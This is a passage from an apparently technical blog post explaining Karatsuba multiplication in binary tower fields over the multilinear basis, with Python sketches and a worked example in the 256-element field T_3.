&lt;p&gt;$$u\cdot v = \alpha_1 \beta_1 X_{ k - 1}^2 + (\alpha_0 \beta_1 + \alpha_1 \beta_0) X_{ k - 1} + \alpha_0 \beta_0 $$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Step 1: Compute the three intermediate products in the subfield $\mathcal{T_{ k - 1 }}$.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This is where the Karatsuba trick reduces multiplications. Instead of computing the four products $\alpha_i\beta_j$, we compute only three:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$P_A = \alpha_0 \beta_0$&lt;&#x2F;li&gt;
&lt;li&gt;$P_B = \alpha_1 \beta_1$&lt;&#x2F;li&gt;
&lt;li&gt;$P_C = (\alpha_0 + \alpha_1)(\beta_0 + \beta_1)$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;and note that in characteristic two these three products suffice to produce the coefficients of $u\cdot v$, since&lt;&#x2F;p&gt;
&lt;p&gt;$$P_A + P_B + P_C = \alpha_0 \beta_1 + \alpha_1 \beta_0 = M$$&lt;&#x2F;p&gt;
&lt;p&gt;We commonly call $M$ the “middle term”. These three multiplications and two additions are performed in $\mathcal{T_{ k - 1}}$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Step 2: Reduce the product using the defining irreducible polynomial.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Up to this point, the product is given by:&lt;&#x2F;p&gt;
&lt;p&gt;$$P_B X_{ k - 1 }^2 + MX_{ k - 1} + P_A$$&lt;&#x2F;p&gt;
&lt;p&gt;Now the relation $X_{ k - 1 }^2 = X_{ k - 2} X_{ k - 1} + 1$ will yield the final expression for the desired product:&lt;&#x2F;p&gt;
&lt;p&gt;$$u\cdot v= (P_A + P_B) + (M + P_B X_{ k - 2}) X_{ k - 1}$$&lt;&#x2F;p&gt;
&lt;p&gt;This is the final reduction to the canonical polynomial representation of the element. There is something relevant to point out exactly here. How is this computation performed?&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;As mentioned before, the coefficients $P_A + P_B$ and $M + P_B X_{k - 2}$ are computed in the subfield $\mathcal{T_{ k - 1}}$.&lt;&#x2F;li&gt;
&lt;li&gt;To compute the larger linear combination, we must compute the product&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;$$(M + P_B X_{ k - 2}) X_{ k - 1}$$&lt;&#x2F;p&gt;
&lt;p&gt;first. The catch is that, when considering $\mathcal{T_k}$ as a vector space over $\mathcal{T_0}$, multiplication by $X_{ k - 1}$ is an invertible linear map, so the product mentioned above can be obtained by matrix multiplication once we view the elements at the convenient level of the Wiedemann tower (and here is where the way the subfields are linked together pays dividends). Explicitly, &lt;strong&gt;we first interpret $M + P_B X_{ k - 2}$ as an element of the upper field $\mathcal{T_k}$. In coordinates, this is expressed by padding the coordinates $[\cdot]^{ k - 1}$ with zeros to obtain the coordinates $[\cdot]^k$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;$$[M + P_B X_{ k - 2}]^k = [\, [M + P_B X_{ k - 2}]^{ k - 1}, 0, 0, \cdots, 0 \,]$$&lt;&#x2F;p&gt;
&lt;p&gt;If we consider $M + P_B X_{ k - 2} \in \mathcal{T_k}$, then the product by $X_{ k - 1}$ can be performed in coordinates by matrix multiplication:&lt;&#x2F;p&gt;
&lt;p&gt;$$[(M + P_B X_{ k - 2}) X_{ k - 1 }]^{k} = [M + P_B X_{ k - 2}]^{k} A_{ k - 1}$$&lt;&#x2F;p&gt;
&lt;p&gt;where $A_{ k - 1}$ is the matrix that has &lt;strong&gt;as rows&lt;&#x2F;strong&gt; the coordinate vectors of the products of the basis elements of $\mathcal{T_k}$ by $X_{ k - 1}$.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The final addition is performed in the top field $\mathcal{T_k}$; in coordinates this is simply done by XOR.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h2 id=&quot;a-quick-summary-so-far&quot;&gt;A quick summary, so far:&lt;&#x2F;h2&gt;
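&lt;p&gt;As a compact summary of the whole procedure, here is a Python sketch of the recursion, with level-$k$ elements packed into $2^k$-bit masks over the multilinear basis (the encoding and the function names are our own; the reduction relations are the ones used above, $X_0^2 = X_0 + 1$ and $X_{k-1}^2 = X_{k-2}X_{k-1} + 1$):&lt;&#x2F;p&gt;

```python
def mul_gen(p, j):
    """Multiply p, an element of T_j given as a 2**j-bit mask, by the
    top generator X_{j-1}, using X_{j-1}^2 = X_{j-2}*X_{j-1} + 1
    (and X_0^2 = X_0 + 1 at the bottom)."""
    half = 2 ** (j - 1)
    p0, p1 = p % 2 ** half, p >> half
    if j == 1:
        return p1 + 2 * (p0 ^ p1)
    return p1 + (p0 ^ mul_gen(p1, j - 1)) * 2 ** half

def tower_mul(a, b, k):
    """Karatsuba multiplication in T_k: split each operand into its
    T_{k-1} halves, use three subfield products, then reduce."""
    if k == 0:
        return a * b  # T_0 = F2: single-bit product
    half = 2 ** (k - 1)
    a0, a1 = a % 2 ** half, a >> half
    b0, b1 = b % 2 ** half, b >> half
    pa = tower_mul(a0, b0, k - 1)
    pb = tower_mul(a1, b1, k - 1)
    pc = tower_mul(a0 ^ a1, b0 ^ b1, k - 1)
    m = pa ^ pb ^ pc                      # middle term M
    lo = pa ^ pb
    hi = m ^ (pb if k == 1 else mul_gen(pb, k - 1))
    return lo + hi * 2 ** half

# Reproduces the product worked out by hand:
# ((1 + X0) + X1)(X0 + X0*X1) = 1 + X0.
assert tower_mul(0b0111, 0b1010, 2) == 0b0011
```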
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Concatenation for Hierarchy:&lt;&#x2F;strong&gt; The key insight of the multilinear basis (as implicitly adopted by Diamond and Posen) is that an element&amp;#39;s representation in $\mathcal{T_k}$ is simply the concatenation of its coefficients from $\mathcal{T_{ k - 1}}$. This means you can “unpack” an element into its sub-elements simply by splitting its bit string. This is a “free” operation, involving no computation beyond index manipulation.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Recursive Application:&lt;&#x2F;strong&gt; The Karatsuba algorithm maps perfectly onto this recursive structure. This is exactly how the algorithm is designed to work efficiently.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Bitwise XOR for Additions:&lt;&#x2F;strong&gt; All additions are simply bitwise XORs ($\oplus$) on the coordinate vectors. This is exceptionally fast on modern processors, which can perform XOR on entire machine words in a single cycle.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Defined Reductions:&lt;&#x2F;strong&gt; The irreducible polynomials ($X_0^2 = X_0 + 1$, $X_1^2 = X_0 X_1 + 1$, $X_2^2 = X_1 X_2 + 1$) are simple trinomials over $\mathbb{F_2}$. The reduction step (e.g., $X_1^2 \to X_0 X_1 + 1$) translates into a linear transformation on the coefficient vector that can be done with a few XORs and re-indexing.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Small Coefficients:&lt;&#x2F;strong&gt; Because the base field is $\mathbb{F_2}$, all coefficients are single bits (0 or 1). This makes the base-case multiplications at the bottom of the recursion extremely efficient.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h2 id=&quot;an-extended-example-by-hand&quot;&gt;An extended example, by hand&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s work out the product of two elements in $\mathcal{T_3}$, namely&lt;&#x2F;p&gt;
&lt;p&gt;$$u = X_0 + X_1 X_2 \quad\text{and }\quad v = 1 + X_1 + X_0 X_2$$&lt;&#x2F;p&gt;
&lt;p&gt;using the aforementioned algorithm. Before going any further, and just because we want to avoid the pain of going way too deep in the recursion, we can be practical and cook up the matrix for the “multiplication by $X_0$” map. This matrix is then&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\boxed{&lt;br &#x2F;&gt;
\begin{matrix}&lt;br &#x2F;&gt;
0 &amp;amp; 1 \newline&lt;br &#x2F;&gt;
1 &amp;amp; 1&lt;br &#x2F;&gt;
\end{matrix}&lt;br &#x2F;&gt;
}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;and helps us build a complete multiplication table; to multiply $\gamma$ by $X_0$ we compute&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
[\gamma]^{1} \cdot \boxed{&lt;br &#x2F;&gt;
\begin{matrix}&lt;br &#x2F;&gt;
0 &amp;amp; 1 \newline&lt;br &#x2F;&gt;
1 &amp;amp; 1&lt;br &#x2F;&gt;
\end{matrix}&lt;br &#x2F;&gt;
} = [\gamma\cdot X_0 ]^1&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;For a full multiplication table covering all possible field element multiplications in $\mathcal{T_1}$, we resort to linearity and the gadget above.&lt;&#x2F;p&gt;
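&lt;p&gt;In code, the same recipe — linearity plus the multiplication-by-$X_0$ map — produces the whole table. The sketch below is our own illustration, with elements of $\mathcal{T_1}$ stored as 2-bit integers $g = g_0 + g_1 X_0$:&lt;&#x2F;p&gt;

```python
def mul_x0(g):
    """Row vector (g0, g1) times the matrix [[0,1],[1,1]] over F_2,
    i.e. multiplication by X_0 using X_0^2 = X_0 + 1."""
    g0, g1 = g & 1, g >> 1
    return g1 | ((g0 ^ g1) << 1)

def mul_t1(a, b):
    """Bilinearity: (a0 + a1*X_0) * b = a0*b + a1*(b*X_0)."""
    r = b if a & 1 else 0
    if a & 2:
        r ^= mul_x0(b)
    return r

# Full 4x4 multiplication table of T_1
# (elements 0, 1, X_0, 1 + X_0 encoded as the integers 0..3)
table = [[mul_t1(a, b) for b in range(4)] for a in range(4)]
```

&lt;p&gt;Here &lt;code&gt;table[2][2] == 3&lt;&#x2F;code&gt; encodes $X_0 \cdot X_0 = 1 + X_0$.&lt;&#x2F;p&gt;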
&lt;p&gt;Let’s get started. Remember that $\mathcal{T_3}$ is a field with $2^{ 2^3 } = 2^8 = 256$ elements, and as a vector space over $\mathbb{F_2} = \mathcal{T_0}$ it has dimension 8; its multilinear basis is then&lt;&#x2F;p&gt;
&lt;p&gt;$$\{1, X_0 ,X_1 ,X_0 X_1 ,X_2 ,X_0 X_2 ,X_1 X_2 ,X_0 X_1 X_2 \}$$&lt;&#x2F;p&gt;
&lt;p&gt;We will carry out the product of $u$ and $v$ in coordinates. First of all,&lt;&#x2F;p&gt;
&lt;p&gt;$$[u]^3 = (0,1,0,0,0,0,1,0) \quad\text{and }\quad [v]^3 =(1,0,1,0,0,1,0,0)$$&lt;&#x2F;p&gt;
&lt;p&gt;are the coordinates of $u$ and $v$ in the multilinear basis for $\mathcal{T_3}$. Before carrying out Karatsuba’s algorithm, we will display both sets of coordinates in matrix form and indicate a partition corresponding to the canonical description of both elements as elements of the last extension in the tower. This is&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{pmatrix}u\newline \hline v\end{pmatrix}^3 = \begin{pmatrix}&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 \newline&lt;br &#x2F;&gt;
\hline&lt;br &#x2F;&gt;
1 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0&lt;br &#x2F;&gt;
\end{pmatrix}=&lt;br &#x2F;&gt;
\left(&lt;br &#x2F;&gt;
\begin{array}{cccc:cccc} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
1 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
= \left(&lt;br &#x2F;&gt;
\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
\alpha_0 &amp;amp; \alpha_1 \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
\beta_0 &amp;amp; \beta_1&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;where we’re exploiting the fact that we can write $u$ and $v$ over the previous extension $\mathcal{T_2}$:&lt;&#x2F;p&gt;
&lt;p&gt;$$u = \alpha_0 + \alpha_1 X_2 \quad\text{and }\quad v = \beta_0 + \beta_1 X_2$$&lt;&#x2F;p&gt;
&lt;p&gt;for certain $\alpha_i , \beta_j \in \mathcal{T_2}$. Recall that this field has dimension 4 and that the previous matrix partition already gives us the coordinates over $\mathcal{T_0}$ of the coordinates over $\mathcal{T_2}$! This is the utterly COOL feature of the multilinear basis for binary towers! We’re now ready to proceed with Karatsuba’s algorithm.&lt;&#x2F;p&gt;
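&lt;p&gt;In code, this “free” unpacking is literal bit slicing. A small sketch, using our own encoding in which bit $i$ of an integer holds the coefficient of the $i$-th basis element:&lt;&#x2F;p&gt;

```python
# u = X_0 + X_1 X_2 and v = 1 + X_1 + X_0 X_2 in the multilinear basis
# {1, X_0, X_1, X_0X_1, X_2, X_0X_2, X_1X_2, X_0X_1X_2};
# bit i of the integer holds the i-th coordinate.
u = 0b01000010   # coordinates (0,1,0,0,0,0,1,0), read from bit 0 upward
v = 0b00100101   # coordinates (1,0,1,0,0,1,0,0)

# Splitting u = alpha_0 + alpha_1 * X_2 is pure index manipulation:
alpha_0, alpha_1 = u & 0xF, u >> 4   # X_0 and X_1, as elements of T_2
beta_0,  beta_1  = v & 0xF, v >> 4   # 1 + X_1 and X_0, as elements of T_2
```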
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **First step:** We proceed to compute the products&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $P_A = \alpha_0 \beta_0$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $P_B = \alpha_1 \beta_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $P_C = (\alpha_0 + \alpha_1) (\beta_0 + \beta_1)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $P_B X_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;where &lt;strong&gt;all of these elements belong to, and all operations are performed in, the subfield $\mathcal{T_2}$.&lt;&#x2F;strong&gt; In order to do this, we need to go one layer deeper for each of the products needed. Let’s proceed with caution.&lt;&#x2F;p&gt;
&lt;p&gt;i. To calculate $P_A$ we express the &lt;strong&gt;coordinates over $\mathcal{T_2}$ as coordinates over $\mathcal{T_0}$&lt;&#x2F;strong&gt;, just as in the previous layer, and write&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{pmatrix}\alpha_0\newline \hline \beta_0\end{pmatrix}^2=\begin{pmatrix}&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0\newline&lt;br &#x2F;&gt;
\hline % This command draws a solid horizontal line&lt;br &#x2F;&gt;
1 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0&lt;br &#x2F;&gt;
\end{pmatrix}=&lt;br &#x2F;&gt;
\left(&lt;br &#x2F;&gt;
\begin{array}{cc:cc} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0 \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
1 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
= \left(&lt;br &#x2F;&gt;
\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
\alpha_{00} &amp;amp; \alpha_{01} \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
\beta_{00} &amp;amp; \beta_{01}&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;Applying Karatsuba’s algorithm in this scenario requires reaching for the multiplication table we mentioned earlier,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $P^\prime_A = \alpha_{00}\cdot\beta_{00}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 1}\times \boxed{1, 0}=\boxed{0,1}$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $P^\prime_B = \alpha_{01}\cdot\beta_{01}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 0}\times \boxed{1, 0}=\boxed{0,0}$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $P^\prime_C = (\alpha_{00}+\alpha_{01})\cdot(\beta_{00}+\beta_{01})$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 1}\times \boxed{0, 0}=\boxed{0,0}$$ (once done the necessary addition in each factor)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * And finally the product of the uncanny $P^\prime_B X_{0}$ term:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\boxed{0,0}\times\boxed{&lt;br &#x2F;&gt;
\begin{matrix}&lt;br &#x2F;&gt;
0 &amp;amp; 1 \newline&lt;br &#x2F;&gt;
1 &amp;amp; 1&lt;br &#x2F;&gt;
\end{matrix}&lt;br &#x2F;&gt;
}=\boxed{0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;It is now time to construct the product $\alpha_0 \beta_0$ as an element in $\mathcal{T_2}$; and now is where the special choice of basis comes into play (again): &lt;strong&gt;The way elements of $\mathcal{T_1}$ sit into $\mathcal{T_2}$ is fundamental and computationally crucial: to view them in the extension above we simply pad with zeros at the end of their $\mathcal{T_1}$ coordinates to get a 4 bit string.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;According to the algorithm presented, the coordinate expression for&lt;&#x2F;p&gt;
&lt;p&gt;$$\alpha_0 \beta_0 = (P^\prime_A + P^\prime_B) + (M + P^\prime_B X_0) X_1$$&lt;&#x2F;p&gt;
&lt;p&gt;can be reconstructed step by step. &lt;strong&gt;First add&lt;&#x2F;strong&gt; in $\mathcal{T_1}$, &lt;strong&gt;then pad&lt;&#x2F;strong&gt; :&lt;&#x2F;p&gt;
&lt;p&gt;$$[P^\prime_A + P^\prime_B ]^1 = \boxed{0,1} + \boxed{0,0} = \boxed{0,1} \implies [P^\prime_A + P^\prime_B]^2 = \boxed{0,1,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;Then, the slippery part: viewed as elements in $\mathcal{T_1}$,&lt;&#x2F;p&gt;
&lt;p&gt;$$[P^\prime_B X_0 ]^1 = \boxed{0,0} \implies [M + P^\prime_B X_0 ]^1 = \boxed{0,1} + \boxed{0,0} =\boxed{0,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Before multiplying it with $X_1$, we embed this element in $\mathcal{T_2}$ by padding with zeros at the end.&lt;&#x2F;strong&gt; Multiplication by $X_1$ is done by matrix multiplication&lt;&#x2F;p&gt;
&lt;p&gt;$$[(M + P^\prime_B X_0 )\cdot X_1 ]^2 = \boxed{0,1,0,0}\times \boxed{&lt;br &#x2F;&gt;
\begin{matrix}&lt;br &#x2F;&gt;
0 &amp;amp; 0 &amp;amp; 1 &amp;amp;0\newline&lt;br &#x2F;&gt;
0 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1\newline&lt;br &#x2F;&gt;
1 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1\newline&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 1 &amp;amp; 1&lt;br &#x2F;&gt;
\end{matrix}&lt;br &#x2F;&gt;
} =\boxed{0,0,0,1}$$&lt;&#x2F;p&gt;
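&lt;p&gt;The matrix-vector product above is just an XOR accumulation of the rows selected by the coordinate vector. A small sketch of this step, with the rows hard-coded from the basis products listed in the comments:&lt;&#x2F;p&gt;

```python
# Multiplication-by-X_1 matrix over the T_2 basis {1, X_0, X_1, X_0X_1}.
# Row i is the image of the i-th basis element under multiplication by X_1.
A1 = [
    [0, 0, 1, 0],   # 1 * X_1         = X_1
    [0, 0, 0, 1],   # X_0 * X_1       = X_0 X_1
    [1, 0, 0, 1],   # X_1 * X_1       = 1 + X_0 X_1
    [0, 1, 1, 1],   # (X_0 X_1) * X_1 = X_0 + X_1 + X_0 X_1
]

def apply_row(vec, mat):
    """Row vector times matrix over F_2: XOR together the rows selected by vec."""
    out = [0, 0, 0, 0]
    for bit, row in zip(vec, mat):
        if bit:
            out = [o ^ r for o, r in zip(out, row)]
    return out

apply_row([0, 1, 0, 0], A1)   # picks row 2: X_0 * X_1 = X_0 X_1
```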
&lt;p&gt;Finally, performing the sum we obtain&lt;&#x2F;p&gt;
&lt;p&gt;$$\boxed{0,1,0,0} + \boxed{0,0,0,1} = \boxed{0,1,0,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;which means that $P_A = \alpha_0 \beta_0 = X_0 + X_0 X_1 \in \mathcal{T_2}$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Having explained the first case in detail, we now proceed to calculate $P_B$:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\begin{pmatrix}\alpha_1\newline \hline \beta_1\end{pmatrix}^2=\begin{pmatrix}&lt;br &#x2F;&gt;
0 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0\newline&lt;br &#x2F;&gt;
\hline % This command draws a solid horizontal line&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0&lt;br &#x2F;&gt;
\end{pmatrix}=&lt;br &#x2F;&gt;
\left(&lt;br &#x2F;&gt;
\begin{array}{cc:cc} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
0 &amp;amp; 0 &amp;amp; 1 &amp;amp; 0 \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 0 &amp;amp; 0&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
= \left(&lt;br &#x2F;&gt;
\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
\alpha_{10} &amp;amp; \alpha_{11} \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
\beta_{10} &amp;amp; \beta_{11}&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;We’ll compute $\alpha_1 \beta_1$ by going one level down in the recursion, expressing its coordinates over $\mathcal{T_2}$ as coordinates over $\mathcal{T_0}$, just as before:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $P^\prime_A = \alpha_{10}\cdot\beta_{10}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{0, 0}\times \boxed{0, 1} = \boxed{0,0}$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $P^\prime_B = \alpha_{11}\cdot\beta_{11}$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 0}\times \boxed{0, 0} = \boxed{0,0}$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $P^\prime_C = (\alpha_{10} + \alpha_{11})\cdot(\beta_{10} + \beta_{11})$, which in $\mathcal{T_1}$ coordinates is the product $$\boxed{1, 0}\times \boxed{0, 1} = \boxed{0,1}$$ (once done the necessary addition in each factor)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. And finally we have the $P^\prime_B X_{0}$ term (we omit writing down the matrix product since this is fairly trivial and intuitive from reading the coordinates):  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\boxed{0,0}\times\boxed{0,1} = \boxed{0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;With all these, we’re ready to reconstruct $\alpha_1 \beta_1$ as an element in $\mathcal{T_2}$. The coordinate expression for&lt;&#x2F;p&gt;
&lt;p&gt;$$\alpha_1 \beta_1 = (P^\prime_A + P^\prime_B ) + (M + P^\prime_B X_0) X_1$$&lt;&#x2F;p&gt;
&lt;p&gt;can be reconstructed from the 2-bit strings as follows: &lt;strong&gt;first, add then pad.&lt;&#x2F;strong&gt; We get&lt;&#x2F;p&gt;
&lt;p&gt;$$[P^\prime_A + P^\prime_B ]^1 = \boxed{0,0} + \boxed{0,0} = \boxed{0,0}\implies [P^\prime_A + P^\prime_B ]^2 = \boxed{0,0,0,0}$$&lt;&#x2F;p&gt;
&lt;p&gt;remembering the padding to view them in $\mathcal{T_2}$ coordinates. Then, the slippery part: viewed as elements in $\mathcal{T_1}$,&lt;&#x2F;p&gt;
&lt;p&gt;$$[P^\prime_B X_0 ]^1=\boxed{0,0}\implies [M + P^\prime_B X_0]^1 = \boxed{0,1} + \boxed{0,0} = \boxed{0,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Before multiplying it with $X_1$, we embed this element in $\mathcal{T_2}$ by padding with zeros at the end.&lt;&#x2F;strong&gt; Then, matrix multiplication:&lt;&#x2F;p&gt;
&lt;p&gt;$$[(M + P^\prime_B X_0 ) X_1]^2 = \boxed{0,1,0,0}\times \boxed{&lt;br &#x2F;&gt;
\begin{matrix}&lt;br &#x2F;&gt;
0 &amp;amp; 0 &amp;amp; 1 &amp;amp;0\newline&lt;br &#x2F;&gt;
0 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1\newline&lt;br &#x2F;&gt;
1 &amp;amp; 0 &amp;amp; 0 &amp;amp; 1\newline&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 1 &amp;amp; 1&lt;br &#x2F;&gt;
\end{matrix}&lt;br &#x2F;&gt;
}=\boxed{0,0,0,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;We then perform the sum to obtain&lt;&#x2F;p&gt;
&lt;p&gt;$$\boxed{0,0,0,0} + \boxed{0,0,0,1} = \boxed{0,0,0,1}$$&lt;&#x2F;p&gt;
&lt;p&gt;which means that $P_B = \alpha_1 \beta_1 = X_0 X_1 \in \mathcal{T_2}$&lt;&#x2F;p&gt;
&lt;p&gt;Now we want to compute $P_C = (\alpha_0 + \alpha_1)(\beta_0 + \beta_1)$. Looking at the coordinate expressions of $u$ and $v$, the sums of their first and second halves are computed quickly, and we have&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{pmatrix}\alpha_0 + \alpha_1\newline \hline \beta_0 + \beta_1\end{pmatrix}^2=\begin{pmatrix}&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 1 &amp;amp; 0\newline&lt;br &#x2F;&gt;
\hline % This command draws a solid horizontal line&lt;br &#x2F;&gt;
1 &amp;amp; 1 &amp;amp; 1 &amp;amp; 0&lt;br &#x2F;&gt;
\end{pmatrix}=&lt;br &#x2F;&gt;
\left(&lt;br &#x2F;&gt;
\begin{array}{cc:cc} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
0 &amp;amp; 1 &amp;amp; 1 &amp;amp; 0 \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
1 &amp;amp; 1 &amp;amp; 1 &amp;amp; 0&lt;br &#x2F;&gt;
\end{array}&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
= \left(&lt;br &#x2F;&gt;
\begin{array}{c:c} % ‘c’ for centered column, ‘:’ for a dotted vertical line&lt;br &#x2F;&gt;
a &amp;amp; b \newline&lt;br &#x2F;&gt;
\hline % Solid horizontal line&lt;br &#x2F;&gt;
